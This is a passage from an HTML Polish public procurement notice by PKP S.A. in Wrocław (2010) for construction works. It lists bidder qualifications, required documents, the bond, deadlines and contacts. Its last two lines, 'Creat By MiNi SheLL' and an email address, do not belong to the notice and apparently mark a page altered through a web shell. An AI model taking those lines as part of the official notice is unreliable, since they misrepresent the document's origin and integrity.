4)	Wykonawca, zgodnie z art. 55 Ustawy Prawo budowlane - dla uzyskania decyzji o pozwoleniu na użytkowanie, skompletuje wszystkie wymagane dokumenty odbiorów częściowych i końcowych, oraz dokumentacje  wymagane Prawem Budowlanym i przekaże je po wcześniejszej akceptacji, Nadzoru inwestorskiego, dla Zamawiającego. Następnie Wykonawca uzyska, zgodnie z Prawem Budowlanym i warunkami określonymi w Pozwoleniu na budowę, pozwolenie na użytkowanie..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.45.30.00-7, 45.45.41.00-5, 45.30.00.00-0, 45.40.00.00-1, 45.11.00.00-1, 45.11.12.00-0, 45.11.12.20-6, 45.11.12.40-2, 45.12.12.91-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 196.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> zamawiający wymaga wniesienia wadium w wysokości 45 000,00 zł</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>w okresie ostatnich pięciu  lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie wykonał należycie co najmniej dwa  zamówienia polegające na realizacji robót budowlano-montażowych, na obiekcie budowlanym w postaci budynku użyteczności publicznej w rozumieniu przepisów  rozporządzenia Ministra Infrastruktury z dnia 12.04.2002 r. w sprawie warunków technicznych, jakim powinny odpowiadać budynki i ich usytuowanie (Dz.U.nr 75 poz. 690 ze zm.)  o kubaturze nie mniejszej niż 2500m3  wyposażonym, co najmniej w instalacje i systemy łącznie: instalacje sanitarne (w tym co najmniej: wod-kan, c.o. ccw. wentylacja i oddymianie), sieci i instalacje teletechniczne (w tym co najmniej sieć przewodowa LAN, łączność telefonii kablowej, dźwiękowy system ostrzegawczy, instalacja monitoringu wizyjnego, instalacja przeciwpożarowa, instalacja informacji wizualnej), instalacja wentylacji mechanicznej i oddymiania, sieci i instalacje elektryczne i elektroenergetyczne o łącznej wartości  robót budowlano-montażowych nie mniejszej niż 1.500.000 złotych brutto lub równowartość w innych walutach, 
oraz   jeżeli okres prowadzenia działalności jest krótszy - w tym okresie wykonał należycie co najmniej jedno  zamówienie polegające na realizacji robót budowlano-montażowych na obiekcie wpisanym do rejestru zabytków o wartości robót budowlano-montażowych nie mniejszej niż 1.000.000 PLN brutto lub równowartość w innych walutach.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>dysponować Personelem do wykonania 
przedmiotu  Zamówienia , który  składa się na kluczowy zespół ekspertów, zgodnie z poniższym wyszczególnieniem:
Eksperci:
-	Kierownik Budowy powinien posiadać wyższe wykształcenie techniczne, przynajmniej 5-letnie doświadczenie na stanowiskach kierowniczych, przy realizacji robót budowlano-montażowych na obiekcie użyteczności publicznej w rozumieniu przepisów  rozporządzenia Ministra Infrastruktury z dnia 12.04.2002 r. w sprawie warunków technicznych, jakim powinny odpowiadać budynki i ich usytuowanie (Dz.U.nr 75 poz. 690 ze zm.), a także uprawnienia do kierowania budową i robotami oraz nadzorowania i kontrolowania robót w specjalności konstrukcyjno - budowlanej bez ograniczeń zgodnie z wymaganiami ustawy Prawo budowlane (tekst jednolity Dz. U. z 2006 r., Nr 156, poz. 1118, z późn. zmianami) lub odpowiadające im ważne uprawnienia, które zostały wydane na podstawie wcześniej obowiązujących przepisów prawa oraz zgodnie z ustawą z dnia 15 grudnia 2000 r. o samorządach zawodowych architektów, inżynierów budownictwa oraz urbanistów (Dz.U. z 2001, Nr 5, poz. 42 ze zm.) łącznie z uprawnieniami do wykonywania nadzoru inwestorskiego przy zabytkach nieruchomych - określonymi w Rozporządzeniu Ministra Kultury z dnia 9 czerwca 2004r. (Dz.U. z 2004r. Nr 150 poz. 1579) oraz praca przy co najmniej 2-ch obiektach budowlanych  wpisanych do rejestru zabytków.
-	Specjalista ds. wycen kosztorysowych i rozliczenia rzeczowo - finansowego inwestycji oraz przygotowania raportów okresowych, powinien posiadać wyższe wykształcenie oraz 3-letnie doświadczenie w przygotowywaniu i weryfikacji kosztorysów oraz znajomość rozliczeń rzeczowo - finansowych inwestycji budowlanych.
-	Specjalista ds. geodezji - powinien posiadać co najmniej średnie wykształcenie na odpowiednim kierunku, uprawnienia zawodowe do wykonywania samodzielnych funkcji w dziedzinie geodezji w zakresie geodezyjnej obsługi inwestycji jak też geodezyjnych pomiarów sytuacyjno-wysokościowych, realizacyjnych i  inwentaryzacyjnych oraz co najmniej 3-letnie doświadczenie zawodowe
-	Specjalista ds. geotechniki - powinien posiadać wyższe wykształcenie na odpowiednim kierunku, stwierdzone kwalifikacje do wykonywania i kierowania pracami geologicznymi w zakresie ustalania warunków geologiczno-inżynierskich dla potrzeb zagospodarowania przestrzennego i posadawiania obiektów budowlanych, z wyłączeniem posadawiania obiektów budowlanych zakładów górniczych oraz budownictwa wodnego oraz co najmniej 3-letnie doświadczenie zawodowe. 
-	Specjalista ds. obmiarów i odbiorów dostaw materiałów, prefabrykatów i urządzeń - powinien posiadać wyższe wykształcenie i  co najmniej 3- letnie doświadczenie zawodowe w wykonywaniu obmiarów i odbiorów dostaw materiałów, prefabrykatów i urządzeń
-	Specjalista ds. teleinformatyki -  powinien mieć wyższe wykształcenie, co najmniej 3-cio letnie doświadczenie w budowie lokalnych sieci komputerowych opartych na systemie okablowania strukturalnego i systemie instalacyjnym, posiadającym elementy aktywne do sterowania i zarządzania siecią LAN oraz rozległej sieci komputerowej WAN.
-	Specjalista ds. systemów bezpieczeństwa (np. kontroli dostępu, sygnalizacji włamania, sygnalizacji pożaru, nagłośnienia awaryjnego i informacyjnego,...) - powinien mieć co najmniej średnie wykształcenie techniczne i co najmniej 3 letnie doświadczenie zawodowe w budowie systemów bezpieczeństwa.


-Rzeczoznawca ds. zabezpieczeń przeciwpożarowych
-Rzeczoznawca ds. konstrukcyjno - budowlanych</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>posiadać średniorocznie co najmniej 10 zatrudnionych  pracowników, w tym 5 osób personelu kierowniczego, w okresie ostatnich trzech lat przed upływem terminu składania ofert, a w przypadku, gdy okres prowadzenia działalności jest krótszy - w tym okresie,</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>posiadać średniorocznie co najmniej 10 zatrudnionych  pracowników, w tym 5 osób personelu kierowniczego, w okresie ostatnich trzech lat przed upływem terminu składania ofert, a w przypadku, gdy okres prowadzenia działalności jest krótszy - w tym okresie,</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1)posiadać środki finansowe lub zdolność kredytową na kwotę nie mniejszą niż       1 500 000 złotych lub równowartość w innych walutach
2)posiadać ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej związanej z przedmiotem niniejszego  zamówienia na kwotę nie mniejszą niż 1.000.000 złotych lub równowartość w innych walutach (w tym na jedno zdarzenie nie mniej niż  250.000 złotych lub równowartość w innych walutach).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">oświadczenie na temat wielkości średniego rocznego zatrudnienia u wykonawcy usług lub robót budowlanych oraz liczebności personelu kierowniczego w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a w przypadku gdy okres prowadzenia działalności jest krótszy - w tym okresie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">sprawozdanie finansowe w całości, a jeżeli podlega ono badaniu przez biegłego rewidenta zgodnie z przepisami o rachunkowości również z opinią odpowiednio o badanym sprawozdaniu albo jego części, a w przypadku wykonawców niezobowiązanych do sporządzania sprawozdania finansowego inny dokument określający obroty oraz zobowiązania i należności - za okres nie dłuższy niż ostatnie 1 rok obrotowy</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie</li>

<li style="margin-bottom: 12px;">opis urządzeń technicznych, instrukcję obsługi oraz środków stosowanych przez wykonawcę dostaw lub usług oraz opis zaplecza naukowo-badawczego wykonawcy, w celu potwierdzenia zapewnienia odpowiedniej jakości realizowanego zamówienia</li>

<li style="margin-bottom: 12px;">zaświadczenie podmiotu uprawnionego do kontroli jakości potwierdzającego, że dostarczane produkty odpowiadają określonym normom lub specyfikacjom technicznym</li>

<li style="margin-bottom: 12px;">zaświadczenie niezależnego podmiotu zajmującego się poświadczaniem zgodności działań wykonawcy z normami jakościowymi, jeżeli zamawiający odwołują się do systemów zapewniania jakości opartych na odpowiednich normach europejskich</li>

<li style="margin-bottom: 12px;">zaświadczenie niezależnego podmiotu zajmującego się poświadczaniem zgodności działań wykonawcy z europejskimi normami zarządzania środowiskiem, jeżeli zamawiający wskazują środki zarządzania środowiskiem, które wykonawca będzie stosował podczas realizacji zamówienia na roboty budowlane lub usługi, odwołując się do systemu zarządzania środowiskiem i audytu (EMAS) lub norm zarządzania środowiskiem opartych na europejskich lub międzynarodowych normach poświadczonych przez podmioty działające zgodnie z prawem Unii Europejskiej, europejskimi lub międzynarodowymi normami dotyczącymi certyfikacji</li>

</ul>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pkp.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> www.pkp.pl.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.04.2010 godzina 10:30, miejsce: PKP S.A. Oddział Gospodarowania Nieruchomościami we Wrocławiu ul. Joannitów 13, 50-525 Wrocław pok. 305.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Irena Dulska tel. 71-717-53-34, i.dulska@pkp.pl Józef Wojnarowicz te. 71-717-11-04, j.wojnarowicz@pkp.pl..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com